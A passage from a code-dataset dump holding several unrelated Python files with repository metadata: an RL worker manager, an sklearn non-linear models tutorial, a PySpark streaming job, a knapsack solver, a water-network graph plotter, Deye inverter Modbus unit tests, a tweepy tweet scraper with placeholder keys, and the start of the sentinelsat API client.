environment.Environment(*self.args_env)\n worker = self.WorkerCls(task_index, self.there_pipes[task_index], env, *self.args_worker)\n worker.wait_for_variables_initialization()\n worker()\n\n def start_tensorboard(self):\n if self.tensorboard_process is not None and self.chromium_process is not None:\n if self.tensorboard_process.is_alive() or self.chromium_process.is_alive():\n print(\"restarting tensorboard\")\n self.close_tensorboard()\n port = get_available_port()\n self.tensorboard_process = subprocess.Popen([\"tensorboard\", \"--logdir\", self.logdir, \"--port\", str(port)], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n time.sleep(2)\n self.chromium_process = subprocess.Popen([\"chromium-browser\", \"http://localhost:{}\".format(port)], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n def close_tensorboard(self):\n if self.tensorboard_process is not None and self.chromium_process is not None:\n self.tensorboard_process.terminate()\n self.chromium_process.terminate()\n\n def close_parameter_servers(self):\n for p in self.parameter_servers_processes:\n if p.is_alive():\n p.terminate()\n for p in self.parameter_servers_processes:\n while p.is_alive():\n time.sleep(0.1)\n\n def start_display_worker(self, training=True):\n self.here_display_pipes.append(self.here_worker_pipes[-1])\n self.here_worker_pipes = self.here_worker_pipes[:-1]\n self.here_display_pipes[-1].send((\"run_display\", training))\n\n def set_display_worker_idle(self):\n self.here_display_pipes[-1].send(\"done\") # quit run_display\n self.here_display_pipes[-1].recv() # waiting\n self.here_worker_pipes.append(self.here_display_pipes[-1])\n self.here_display_pipes = self.here_display_pipes[:-1]\n\n def set_all_display_workers_idle(self):\n while len(self.here_display_pipes) > 0:\n self.set_display_worker_idle()\n\n def asynchronously_run_model(self, n_updates):\n for p in self.here_worker_pipes:\n p.send((\"run_model\", n_updates))\n for p in self.here_worker_pipes:\n p.recv()\n\n def asynchronously_run_reinforcement_learning(self, n_updates, train_actor=True):\n for p in self.here_worker_pipes:\n p.send((\"run_reinforcement_learning\", n_updates, train_actor))\n for p in self.here_worker_pipes:\n p.recv()\n\n def asynchronously_run_both(self, n_updates, train_actor=True):\n for p in self.here_worker_pipes:\n p.send((\"run_all\", n_updates, train_actor))\n for p in self.here_worker_pipes:\n p.recv()\n\n def save_model(self, name):\n path = self.checkpointsdir + \"/{}/\".format(name)\n os.mkdir(path)\n self.here_worker_pipes[0].send((\"save\", path))\n print(self.here_worker_pipes[0].recv())\n\n def save_video(self, name, n_sequences, training=True):\n path = self.videodir + \"/{}.mp4\".format(name)\n self.here_worker_pipes[0].send((\"run_video\", path, n_sequences, training))\n print(self.here_worker_pipes[0].recv())\n\n def save_contact_logs(self, name):\n for p in self.here_worker_pipes:\n p.send((\"save_contact_logs\", name))\n for p in self.here_worker_pipes:\n p.recv()\n\n def restore_model(self, path):\n self.here_worker_pipes[0].send((\"restore\", path))\n print(self.here_worker_pipes[0].recv())\n # for p in self.here_worker_pipes:\n # p.send((\"restore\", path))\n # print(p.recv())\n\n def close_workers(self):\n for p in self.here_worker_pipes:\n p.send(\"done\")\n\n def close(self):\n self.close_tensorboard()\n self.set_all_display_workers_idle()\n self.close_workers()\n self.close_parameter_servers()\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.close()\n","repo_name":"charleswilmot/intrinsic_motivations_box2d","sub_path":"src/asynchronous.py","file_name":"asynchronous.py","file_ext":"py","file_size_in_byte":56916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12599953445","text":"'''\nNon-linear models\n=================\n\nHere we focuse on non-linear models for classification. Nevertheless, each\nclassification model has its regression counterpart.\n'''\n\n# get_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\n\nnp.set_printoptions(precision=2)\npd.set_option('precision', 2)\n\n# %%\n# Support Vector Machines (SVM)\n# -----------------------------\n#\n# SVM are based kernel methods require only a user-specified kernel function\n# :math:`K(x_i, x_j)`, i.e., a **similarity function** over pairs of data\n# points :math:`(x_i, x_j)` into kernel (dual) space on which learning\n# algorithms operate linearly, i.e. every operation on points is a linear\n# combination of :math:`K(x_i, x_j)`.\n# Outline of the SVM algorithm:\n#\n# 1. Map points :math:`x` into kernel space using a kernel function:\n# :math:`x \\rightarrow K(x, .)`.\n# 2. Learning algorithms operates linearly by dot product into high-kernel\n# space :math:`K(., x_i) \\cdot K(., x_j)`.\n# - Using the kernel trick (Mercer’s Theorem) replaces dot product in high\n# dimensional space by a simpler operation such that\n# :math:`K(., x_i) \\cdot K(., x_j) = K(x_i, x_j)`.\n# Thus we only need to compute a similarity measure for each pairs of\n# point and store in a :math:`N \\times N` Gram matrix.\n# - Finally, The learning process consist of estimating the $\\alpha_i$ of\n# the decision function that maximises the hinge loss (of :math:`f(x)`)\n# plus some penalty when applied on all training points.\n#\n# .. math::\n#\n# f(x) = \\text{sign} \\left(\\sum_i^N \\alpha_i~y_i~K(x_i, x)\\right).\n#\n# 3. Predict a new point $x$ using the decision function.\n#\n# .. figure:: ../images/svm_rbf_kernel_mapping_and_decision_function.png\n# :alt: Support Vector Machines.\n#\n# Gaussian kernel (RBF, Radial Basis Function):\n#\n# One of the most commonly used kernel is the Radial Basis Function (RBF) Kernel.\n# For a pair of points :math:`x_i, x_j` the RBF kernel is defined as:\n#\n# .. raw:: latex\n#\n# \\begin{align}\n# K(x_i, x_j) &= \\exp\\left(-\\frac{\\|x_i - x_j\\|^2}{2\\sigma^2}\\right)\\\\\n# &= \\exp\\left(-\\gamma~\\|x_i - x_j\\|^2\\right)\n# \\end{align}\n#\n# Where :math:`\\sigma` (or :math:`\\gamma`) defines the kernel width parameter.\n# Basically, we consider a Gaussian function centered on each training sample\n# :math:`x_i`. it has a ready interpretation as a similarity measure as it\n# decreases with squared Euclidean distance between the two feature vectors.\n#\n# Non linear SVM also exists for regression problems.\n\n\n# %%\n# dataset\n\nX, y = datasets.load_breast_cancer(return_X_y=True)\nX_train, X_test, y_train, y_test = \\\n train_test_split(X, y, test_size=0.5, stratify=y, random_state=42)\n\n# %%\n# Preprocessing: unequal variance of input features, requires scaling for svm.\n\nax = sns.displot(x=X_train.std(axis=0), kind=\"kde\", bw_adjust=.2, cut=0,\n fill=True, height=3, aspect=1.5,)\n_ = ax.set_xlabels(\"Std-dev\").tight_layout()\n\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.fit_transform(X_test)\n\n# %%\n# Fit-predict\n# Probalility is a logistic of the decision_function\n\nsvm = SVC(kernel='rbf', probability=True).fit(X_train, y_train)\ny_pred = svm.predict(X_test)\ny_score = svm.decision_function(X_test)\ny_prob = svm.predict_proba(X_test)[:, 1]\n\nax = sns.relplot(x=y_score, y=y_prob, hue=y_pred, height=2, aspect=1.5)\n_ = ax.set_axis_labels(\"decision function\", \"Probability\").tight_layout()\n\n# %% Scores\n\nprint(\"bAcc: %.2f, AUC: %.2f (AUC with proba: %.2f)\" % (\n metrics.balanced_accuracy_score(y_true=y_test, y_pred=y_pred),\n metrics.roc_auc_score(y_true=y_test, y_score=y_score),\n metrics.roc_auc_score(y_true=y_test, y_score=y_prob)))\n\n# Usefull internals: indices of support vectors within original X\nnp.all(X_train[svm.support_, :] == svm.support_vectors_)\n\n\n# %%\n# Random forest\n# -------------\n#\n# Decision tree\n# ~~~~~~~~~~~~~\n#\n# A tree can be \"learned\" by splitting the training dataset into subsets based on an features value test.\n# Each internal node represents a \"test\" on an feature resulting on the split of the current sample. At each step the algorithm selects the feature and a cutoff value that maximises a given metric. Different metrics exist for regression tree (target is continuous) or classification tree (the target is qualitative).\n# This process is repeated on each derived subset in a recursive manner called recursive partitioning. The recursion is completed when the subset at a node has all the same value of the target variable, or when splitting no longer adds value to the predictions. This general principle is implemented by many recursive partitioning tree algorithms.\n#\n# .. figure:: ../images/classification_tree.png\n# :width: 400\n# :alt: Classification tree.\n#\n# Decision trees are simple to understand and interpret however they tend to overfit the data. However decision trees tend to overfit the training set. Leo Breiman propose random forest to deal with this issue.\n#\n# A single decision tree is usually overfits the data it is learning from because it learn from only one pathway of decisions. Predictions from a single decision tree usually don’t make accurate predictions on new data.\n#\n# Forest\n# ~~~~~~\n#\n# A random forest is a meta estimator that fits a number of **decision tree learners** on various sub-samples of the dataset and use averaging to improve the predictive accuracy and control over-fitting.\n# Random forest models reduce the risk of overfitting by introducing randomness by:\n#\n# .. figure:: ../images/random_forest.png\n# :width: 300\n# :alt: Random forest.\n#\n# - building multiple trees (n_estimators)\n# - drawing observations with replacement (i.e., a bootstrapped sample)\n# - splitting nodes on the best split among a random subset of the features selected at every node\n#\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nforest = RandomForestClassifier(n_estimators = 100)\nforest.fit(X_train, y_train)\n\ny_pred = forest.predict(X_test)\ny_prob = forest.predict_proba(X_test)[:, 1]\n\n\n# %% Scores\n\nprint(\"bAcc: %.2f, AUC: %.2f \" % (\n metrics.balanced_accuracy_score(y_true=y_test, y_pred=y_pred),\n metrics.roc_auc_score(y_true=y_test, y_score=y_prob)))\n\n# %%\n# Extra Trees (Low Variance)\n#\n# Extra Trees is like Random Forest, in that it builds multiple trees and splits nodes using random subsets of features, but with two key differences: it does not bootstrap observations (meaning it samples without replacement), and nodes are split on random splits, not best splits. So, in summary, ExtraTrees:\n# builds multiple trees with bootstrap = False by default, which means it samples without replacement\n# nodes are split based on random splits among a random subset of the features selected at every node\n# In Extra Trees, randomness doesn’t come from bootstrapping of data, but rather comes from the random splits of all observations.\n# ExtraTrees is named for (Extremely Randomized Trees).\n\n\n# %%\n# Gradient boosting\n# -----------------\n# \n# Gradient boosting is a meta estimator that fits a sequence of **weak learners**.\n# Each learner aims to reduce the residuals (errors) produced by the previous learner.\n# The two main hyper-parameters are:\n#\n# - The **learning rate** (*lr*) controls over-fitting:\n# decreasing the *lr* limits the capacity of a learner to overfit the residuals, ie,\n# it slows down the learning speed and thus increases the **regularisation**. \n#\n# - The **sub-sampling fraction** controls the fraction of samples to be used for\n# fitting the learners. Values smaller than 1 leads to **Stochastic Gradient Boosting**.\n# It thus controls for over-fitting reducing variance and incresing bias.\n#\n# .. figure:: ../images/gradient_boosting.png\n# :width: 500\n# :alt: Gradient boosting.\n#\n\n\nfrom sklearn.ensemble import GradientBoostingClassifier\n\ngb = GradientBoostingClassifier(n_estimators=100, learning_rate=0.1,\n subsample=0.5, random_state=0)\ngb.fit(X_train, y_train)\n\ny_pred = gb.predict(X_test)\ny_prob = gb.predict_proba(X_test)[:, 1]\n\nprint(\"bAcc: %.2f, AUC: %.2f \" % (\n metrics.balanced_accuracy_score(y_true=y_test, y_pred=y_pred),\n metrics.roc_auc_score(y_true=y_test, y_score=y_prob)))\n","repo_name":"neurospin/pystatsml","sub_path":"machine_learning/ml_supervized_nonlinear.py","file_name":"ml_supervized_nonlinear.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"6"} +{"seq_id":"1164432622","text":"from pyspark.sql import SparkSession, SQLContext\nfrom pyspark.sql.functions import col, expr, struct, lit, concat, array, date_format, current_timestamp\nfrom pyspark.sql.avro.functions import to_avro\n\nspark = SparkSession \\\n .builder \\\n .appName(\"ConsolidarBaseEventosJob\") \\\n .master(\"local[*]\") \\\n .getOrCreate()\n\nspark.sparkContext.setLogLevel('WARN')\n\nspark.readStream \\\n .format(\"parquet\") \\\n .schema(spark.read.parquet(\"D:\\\\s3\\\\efinanceira-monitoracao-transmissao\\\\bkt-staging-data\").schema) \\\n .option(\"path\", \"D:\\\\s3\\\\efinanceira-monitoracao-transmissao\\\\bkt-staging-data\") \\\n .load() \\\n .writeStream \\\n .partitionBy(\"date\") \\\n .format(\"parquet\") \\\n .outputMode(\"append\") \\\n .option(\"path\", \"D:\\\\s3\\\\efinanceira-monitoracao-transmissao\\\\bkt-raw-data\") \\\n .option(\"checkpointLocation\", \"D:\\\\s3\\\\efinanceira-monitoracao-transmissao\\\\bkt-checkpoint-data\\\\consolidar-base-eventos-job\") \\\n .trigger(once=True) \\\n .start() \\\n .awaitTermination()","repo_name":"LeonardoZV/spark-structured-streaming-python-examples","sub_path":"apache-kafka/scripts/consolidar_base_eventos_job.py","file_name":"consolidar_base_eventos_job.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"3019010087","text":"\n\ndef getBestItem(d,candidates):\n bestItem = -1\n bestIndex = -1\n\n for c in candidates:\n best = d[\"profit\"][c] / d[\"risk\"][c]\n if best > bestItem:\n bestItem = best\n bestIndex = c\n\n return bestIndex\n\n\ndef knapsack(d):\n n = len(d[\"name\"])\n candidates = set()\n isSol = False\n sol = []\n\n for i in range(n):\n candidates.add(i)\n\n while not isSol and candidates:\n bestCand = getBestItem(d,candidates)\n candidates.remove(bestCand)\n\n if d[\"risk\"][bestCand] <= d[\"max_risk\"]:\n sol.append(d[\"name\"][bestCand])\n d[\"max_risk\"] -= d[\"risk\"][bestCand]\n else:\n isSol = True\n sol.append(d[\"name\"][bestCand])\n\n return sol\n\n\nif __name__ == '__main__':\n\n N,M = map(int,input().strip().split())\n\n d = {\n \"name\" : [],\n \"risk\" : [],\n \"profit\" : [],\n \"max_risk\" : M\n }\n\n for _ in range(N):\n var = input()\n C, R, B = var.strip().split()\n d[\"name\"].append(C)\n d[\"risk\"].append(int(R))\n d[\"profit\"].append(int(B))\n\n sol = knapsack(d)\n print(*sol)","repo_name":"medranoGG/AlgorithmsPython","sub_path":"03.Voraces/03explodingKittens.py","file_name":"03explodingKittens.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39348245520","text":"import networkx as nx\ntry:\n import matplotlib.pyplot as plt\n from matplotlib.colors import LinearSegmentedColormap\nexcept:\n pass\nimport pandas as pd\nimport logging\n\nlogger = logging.getLogger('wntr.network.draw_graph')\n\ndef draw_graph(wn, node_attribute=None, link_attribute=None, title=None, \n node_size=10, node_range = [None,None], node_cmap=None,\n link_width=1, link_range = [None,None], link_cmap=None, \n add_colorbar=True, figsize=None, dpi=None, directed=False, node_labels=False,plt_fig=None):\n\n r\"\"\"Draw a WaterNetworkModel networkx graph\n \n Parameters\n ----------\n wn : WaterNetworkModel\n A WaterNetworkModel object\n \n node_attribute : str, list, pd.Series, or dict, optional \n (default = None)\n \n - If node_attribute is a string, then the node_attribute dictonary is \n populated using node_attribute = wn.query_node_attribute(str)\n - If node_attribute is a list, then each node is given a value of 1.\n - If node_attribute is a pd.Series, then it shoud be in the format\n {(nodeid,time): x} or {nodeid: x} where nodeid is a string and x is a float. \n The time index is not used in the plot.\n - If node_attribute is a dict, then it shoud be in the format\n {nodeid: x} where nodeid is a string and x is a float\n \n link_attribute : str, list, pd.Series, or dict, optional \n (default = None)\n \n - If link_attribute is a string, then the link_attribute dictonary is \n populated using edge_attribute = wn.query_link_attribute(str)\n - If link_attribute is a list, then each link is given a value of 1.\n - If link_attribute is a pd.Series, then it shoud be in the format\n {(linkid,time): x} or {linkid: x} where linkid is a string and x is a float. \n The time index is not used in the plot.\n - If link_attribute is a dict, then it shoud be in the format\n {linkid: x} where linkid is a string and x is a float. \n \n title : str, optional \n (default = None)\n \n node_size : int, optional \n (default = 10)\n \n node_range : list, optional \n (default = [None,None])\n \n node_cmap : matplotlib.pyplot.cm colormap, optional \n (default = jet)\n \n link_width : int, optional \n (default = 1)\n \n link_range : list, optional \n (default = [None,None])\n \n link_cmap : matplotlib.pyplot.cm colormap, optional \n (default = jet)\n \n add_colorbar : bool, optional \n (default = True)\n \n directed : bool, optional \n (default = False)\n\n node_labels: bool, optional\n If True, the graph will have each node labeled with its name.\n (default = False)\n \n Returns\n -------\n Figure\n \n Examples\n --------\n >>> wn = en.network.WaterNetworkModel('Net1.inp')\n >>> en.network.draw_graph(wn)\n\n Notes\n -----\n For more network draw options, see nx.draw_networkx\n \n \"\"\"\n if plt_fig is None:\n plt.figure(facecolor='w', edgecolor='k')\n \n # Graph \n G = wn.get_graph_deep_copy()\n if not directed:\n G = G.to_undirected()\n \n # Position\n pos = nx.get_node_attributes(G,'pos')\n if len(pos) == 0:\n pos = None\n \n # Node attribute\n if isinstance(node_attribute, str):\n node_attribute = wn.query_node_attribute(node_attribute)\n if isinstance(node_attribute, list):\n node_attribute = dict(zip(node_attribute,[1]*len(node_attribute)))\n if isinstance(node_attribute, pd.Series):\n if node_attribute.index.nlevels == 2: # (nodeid, time) index\n node_attribute.reset_index(level=1, drop=True, inplace=True) # drop time\n node_attribute = dict(node_attribute)\n \n # Define node list, color, and colormap\n if node_attribute is None: \n nodelist = None\n nodecolor = 'k'\n else:\n nodelist,nodecolor = zip(*node_attribute.items())\n if node_cmap is None:\n node_cmap=plt.cm.jet\n \n # Link attribute\n if isinstance(link_attribute, str):\n link_attribute = wn.query_link_attribute(link_attribute)\n if isinstance(link_attribute, list):\n link_attribute = dict(zip(link_attribute,[1]*len(link_attribute)))\n if isinstance(link_attribute, pd.Series):\n if link_attribute.index.nlevels == 2: # (linkid, time) index\n link_attribute.reset_index(level=1, drop=True, inplace=True) # drop time\n link_attribute = dict(link_attribute)\n \n # Replace link_attribute dictonary defined as\n # {link_name: attr} with {(start_node, end_node, link_name): attr}\n if link_attribute is not None: \n attr = {}\n for link_name, value in link_attribute.iteritems():\n link = wn.get_link(link_name)\n attr[(link.start_node(), link.end_node(), link_name)] = value\n link_attribute = attr\n if type(link_width) is dict:\n attr = {}\n for link_name, value in link_width.iteritems():\n link = wn.get_link(link_name)\n attr[(link.start_node(), link.end_node(), link_name)] = value\n link_width = attr\n \n # Define link list, color, and colormap\n if link_attribute is None: \n linklist = None\n linkcolor = 'k'\n else:\n linklist,linkcolor = zip(*link_attribute.items())\n if type(link_width) is dict:\n linklist2,link_width = zip(*link_width.items())\n if not linklist == linklist2:\n logger.warning('Link color and width do not share the same indexes, link width changed to 1.')\n link_width = 1\n if link_cmap is None:\n link_cmap=plt.cm.jet\n \n # Plot\n #plt.figure(facecolor='w', edgecolor='k', figsize=figsize, dpi=dpi)\n \n if title is not None:\n plt.title(title)\n\n if node_labels:\n nodes = nx.draw_networkx_labels(G, pos,\n nodelist=nodelist, node_color=nodecolor, node_size=node_size, cmap=node_cmap, vmin = node_range[0], vmax = node_range[1],linewidths=0)\n else:\n nodes = nx.draw_networkx_nodes(G, pos, with_labels=False, \n nodelist=nodelist, node_color=nodecolor, node_size=node_size, cmap=node_cmap, vmin = node_range[0], vmax = node_range[1],linewidths=0)\n edges = nx.draw_networkx_edges(G, pos, \n edgelist=linklist, edge_color=linkcolor, width=link_width, edge_cmap=link_cmap, edge_vmin = link_range[0], edge_vmax = link_range[1])\n if add_colorbar and node_attribute:\n plt.colorbar(nodes, shrink=0.5, pad = 0)\n if add_colorbar and link_attribute:\n plt.colorbar(edges, shrink=0.5, pad = 0.05)\n plt.axis('off')\n \n return nodes, edges\n\ndef custom_colormap(numcolors=11, colors=['blue','white','red']):\n \"\"\" \n Create a custom colormap\n Default is blue to white to red with 11 colors. \n Colors can be specified in any way understandable by matplotlib.colors.ColorConverter.to_rgb()\n \"\"\"\n cmap = LinearSegmentedColormap.from_list(name='custom', \n colors = colors,\n N=numcolors)\n return cmap\n \n","repo_name":"stephenfrechette/WNTR-test","sub_path":"wntr/network/draw_graph.py","file_name":"draw_graph.py","file_ext":"py","file_size_in_byte":7295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"11775465687","text":"import unittest\nfrom unittest.mock import patch\n\nfrom deye_config import DeyeConfig, DeyeLoggerConfig\nfrom deye_modbus import DeyeModbus\nfrom deye_modbus_tcp import DeyeModbusTcp\n\n\nclass DeyeModbusTest(unittest.TestCase):\n def setUp(self):\n self.config = DeyeConfig(logger_config=DeyeLoggerConfig(1234567890, \"192.168.1.1\", 8899), mqtt=None)\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_read_register_0x01(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a5000000000000000000000000000000000000000000000000010301000ac84300000015\"\n )\n\n # when\n reg_values = sut.read_registers(1, 1)\n\n # then\n self.assertEqual(len(reg_values), 1)\n self.assertTrue(1 in reg_values)\n self.assertEqual(reg_values[1].hex(), \"000a\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_read_registers_0x02_0x03(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a5000000000000000000000000000000000000000000000000010302000a000b13f600000015\"\n )\n\n # when\n reg_values = sut.read_registers(2, 3)\n\n # then\n self.assertEqual(len(reg_values), 2)\n self.assertTrue(2 in reg_values)\n self.assertTrue(3 in reg_values)\n self.assertEqual(reg_values[2].hex(), \"000a\")\n self.assertEqual(reg_values[3].hex(), \"000b\")\n\n # and\n connector.send_request.assert_called_once_with(\n bytearray.fromhex(\"a5170010450000d202964902000000000000000000000000000001030002000265cb5915\")\n )\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_write_register_0x12_to_0xa3d4(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a5000000000000000000000000000000000000000000000000\" + \"011000120001a1cc\" + \"0015\"\n )\n\n # when\n success = sut.write_register(0x12, 0xA3D4)\n\n # then\n self.assertTrue(success)\n connector.send_request.assert_called_once_with(\n bytearray.fromhex(\"a51a0010450000d202964902000000000000000000000000000001100012000102a3d4dd8d2b15\")\n )\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_read_register_SUN_10K_SG04LP3_EU_part1(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a53b0010150007482ee38d020121d0060091010000403e486301032800ffffff160a12162420ffffffffffffffffffffffffffffffffffff0001ffff0001ffff000003e81fa45115\"\n )\n\n # when\n reg_values = sut.read_registers(0x3C, 0x4F)\n\n # then\n self.assertEqual(len(reg_values), 20)\n self.assertTrue(0x3C in reg_values)\n self.assertTrue(0x4F in reg_values)\n self.assertEqual(reg_values[0x3C].hex(), \"00ff\")\n self.assertEqual(reg_values[0x4F].hex(), \"03e8\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_read_register_SUN_10K_SG04LP3_EU_part2(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a5330010150008482ee38d020122d0060091010000403e486301032000010000ffffffffffff0001ffffffffffffffffffff0000ffff0011ffffffff3a005715\"\n )\n\n # when\n reg_values = sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(reg_values), 16)\n self.assertTrue(0x50 in reg_values)\n self.assertTrue(0x5F in reg_values)\n self.assertEqual(reg_values[0x50].hex(), \"0001\")\n self.assertEqual(reg_values[0x5F].hex(), \"ffff\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_incorrect_inverter_serial_number(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a51000101500c9c22576f80201032d0000790800007106d6630600bd15\"\n )\n\n # when\n with self.assertLogs() as captured:\n sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(captured.records), 1)\n self.assertEqual(\n captured.records[0].getMessage(), \"Logger Serial Number does not match. Check your configuration file.\"\n )\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_incorrect_modbus_address(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a51000101500c9c22576f80201032d0000790800007106d6630500bd15\"\n )\n\n # when\n with self.assertLogs() as captured:\n sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(captured.records), 1)\n self.assertEqual(captured.records[0].getMessage(), \"Modbus device address does not match.\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_unknown_error_code(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a51000101500c9c22576f80201032d0000790800007106d6630100bd15\"\n )\n\n # when\n with self.assertLogs() as captured:\n sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(captured.records), 1)\n self.assertEqual(captured.records[0].getMessage(), \"Unknown response error code. Error frame: 0100\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_at_protocol_detected(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"41542b595a434d505645523d4d57335f3136555f353430365f322e33322d44310d0a0d0a\"\n )\n\n # when\n with self.assertLogs() as captured:\n sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(captured.records), 1)\n self.assertEqual(\n captured.records[0].getMessage(),\n \"AT response detected. Try switching to 'AT' protocol. Set 'DEYE_LOGGER_PROTOCOL=at' and remove DEYE_LOGGER_PORT from your config\",\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"kbialek/deye-inverter-mqtt","sub_path":"tests/deye_modbus_test.py","file_name":"deye_modbus_test.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"6"} +{"seq_id":"7790306120","text":"import tweepy\nfrom tweepy import OAuthHandler\n\nconsumer_key = 'YOUR-CONSUMER-KEY'\nconsumer_secret = 'YOUR-CONSUMER-SECRET'\naccess_token = 'YOUR-ACCESS-TOKEN'\naccess_secret = 'YOUR-ACCESS-SECRET'\n \nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n \napi = tweepy.API(auth)\n\n#public_tweets = api.user_timeline('realdonaldtrump', tweet_mode='extended')\n#print(public_tweets[5].text)\n\nmyfile = open('tweets.txt', \"w\")\n\n# for tweet in public_tweets:\n# myfile.write(tweet.full_text+\"\\n\")\n\nfor status in tweepy.Cursor(api.user_timeline, id=\"realDonaldTrump\", tweet_mode='extended', until='2017-03-29').items():\n myfile.write(status.full_text+\"\\n\")\n\nmyfile.close()\n\n# Get the User object for twitter...\nuser = api.get_user('sharmaraghav260')\n\n# print (user.screen_name)\n# print (user.followers_count)\n# for friend in user.friends():\n# print (friend.screen_name)","repo_name":"sharmaraghav260/Analyzing-POTUS","sub_path":"tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9630306476","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport hashlib\nimport logging\nimport re\nimport xml.etree.ElementTree as ET\nfrom collections import OrderedDict\nfrom datetime import date, datetime, timedelta\nfrom os import remove\nfrom os.path import exists, getsize, join\nfrom time import sleep\n\nimport geojson\nimport homura\nimport html2text\nimport pycurl\nimport requests\nfrom tqdm import tqdm\n\nfrom six import string_types\nfrom six.moves.urllib.parse import urljoin\n\nfrom . import __version__ as sentinelsat_version\n\ntry:\n import certifi\nexcept ImportError:\n certifi = None\n\n\nclass SentinelAPI(object):\n \"\"\"Class to connect to Sentinel Data Hub, search and download imagery.\n\n Parameters\n ----------\n user : string\n username for DataHub\n password : string\n password for DataHub\n api_url : string, optional\n URL of the DataHub\n defaults to 'https://scihub.copernicus.eu/apihub'\n\n Attributes\n ----------\n session : requests.Session object\n Session to connect to DataHub\n api_url : str\n URL to the DataHub\n page_size : int\n number of results per query page\n current value: 100 (maximum allowed on ApiHub)\n \"\"\"\n\n logger = logging.getLogger('sentinelsat.SentinelAPI')\n\n def __init__(self, user, password, api_url='https://scihub.copernicus.eu/apihub/'):\n self.session = requests.Session()\n self.session.auth = (user, password)\n self.api_url = api_url if api_url.endswith('/') else api_url + '/'\n self.page_size = 100\n self.user_agent = 'sentinelsat/' + sentinelsat_version\n self.session.headers['User-Agent'] = self.user_agent\n # For unit tests\n self._last_query = None\n self._last_status_code = None\n\n def query(self, area, initial_date=None, end_date=datetime.now(), **keywords):\n \"\"\"Query the SciHub API with the coordinates of an area, a date interval\n and any other search keywords accepted by the SciHub API.\n \"\"\"\n query = self.format_query(area, initial_date, end_date, **keywords)\n return self.load_query(query)\n\n @staticmethod\n def format_query(area, initial_date=None, end_date=datetime.now(), **keywords):\n \"\"\"Create the SciHub API query string\n \"\"\"\n if initial_date is None:\n initial_date = end_date - timedelta(hours=24)\n\n acquisition_date = '(beginPosition:[%s TO %s])' % (\n _format_date(initial_date),\n _format_date(end_date)\n )\n query_area = ' AND (footprint:\"Intersects(POLYGON((%s)))\")' % area\n\n filters = ''\n for kw in sorted(keywords.keys()):\n filters += ' AND (%s:%s)' % (kw, keywords[kw])\n\n query = ''.join([acquisition_date, query_area, filters])\n return query\n\n def load_query(self, query, start_row=0):\n \"\"\"Do a full-text query on the SciHub API using the OpenSearch format specified in\n https://scihub.copernicus.eu/twiki/do/view/SciHubUserGuide/3FullTextSearch\n \"\"\"\n # store last query (for testing)\n self._last_query = query\n\n # load query results\n url = self._format_url(start_row=start_row)\n response = self.session.post(url, dict(q=query), auth=self.session.auth)\n _check_scihub_response(response)\n\n # store last status code (for testing)\n self._last_status_code = response.status_code\n\n # parse response content\n try:\n json_feed = response.json()['feed']\n total_results = 